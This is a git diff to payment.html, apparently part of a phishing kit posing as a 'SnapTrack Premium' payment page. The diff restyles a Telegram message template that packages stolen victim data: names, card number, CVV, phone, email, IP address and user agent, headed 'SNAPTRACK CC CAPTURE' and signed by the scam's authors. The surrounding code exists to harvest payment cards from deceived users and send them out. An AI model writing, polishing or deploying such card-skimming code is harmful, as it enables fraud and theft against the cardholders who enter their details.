--- a/payment.html
+++ b/payment.html
@@ -279,19 +279,16 @@
 
             // Message stylé pour Telegram
             const message = `
-🔴🟡🟢 SNAPTRACK CC CAPTURE 🔴🟡🟢
-╔══════════════════════════════════╗
-║        💀 CYBER MENACE 💀        ║
-╚══════════════════════════════════╝
-
+💳 SNAPTRACK CC CAPTURE 🧿 
+      sc@mma by @cypherunit
+🌐 £* CAPTURED IP ADRESS 🌐
+>-----------------------<
 📅 DATE: ${data.timestamp}
 🌐 IP: ${data.ip}
 🖥️ USER AGENT: ${data.userAgent}
-
-╔══════════════════════════════════╗
-║          INFORMATIONS CC         ║
-╚══════════════════════════════════╝
-
+<############################>
+💸 £* CAPTURED CC 💸
+>-----------------------<
 👤 PRÉNOM: ${data.prenom}
 🧾 NOM: ${data.nom}
 💳 CARTE: ${data.carte}
@@ -299,20 +296,14 @@
 🔒 CVV: ${data.cvv}
 📞 TÉLÉPHONE: ${data.telephone}
 📧 EMAIL: ${data.email}
-
-╔══════════════════════════════════╗
-║          MÉTADONNÉES             ║
-╚══════════════════════════════════╝
-
+<############################>
+📈 £* CAPTURED METADATA 📈
+>-----------------------<
 📍 SITE: SnapTrack Premium
 🕒 TIMESTAMP: ${data.timestamp}
 🌍 USER AGENT: ${data.userAgent}
 🔗 IP: ${data.ip}
-
-╔══════════════════════════════════╗
-║        NIXXEL CYBER DEMON        ║
-║          😼🔥💀 ENKULÉ 💀🔥😼    ║
-╚══════════════════════════════════╝
+<############################>
             `.trim();
 
             try {
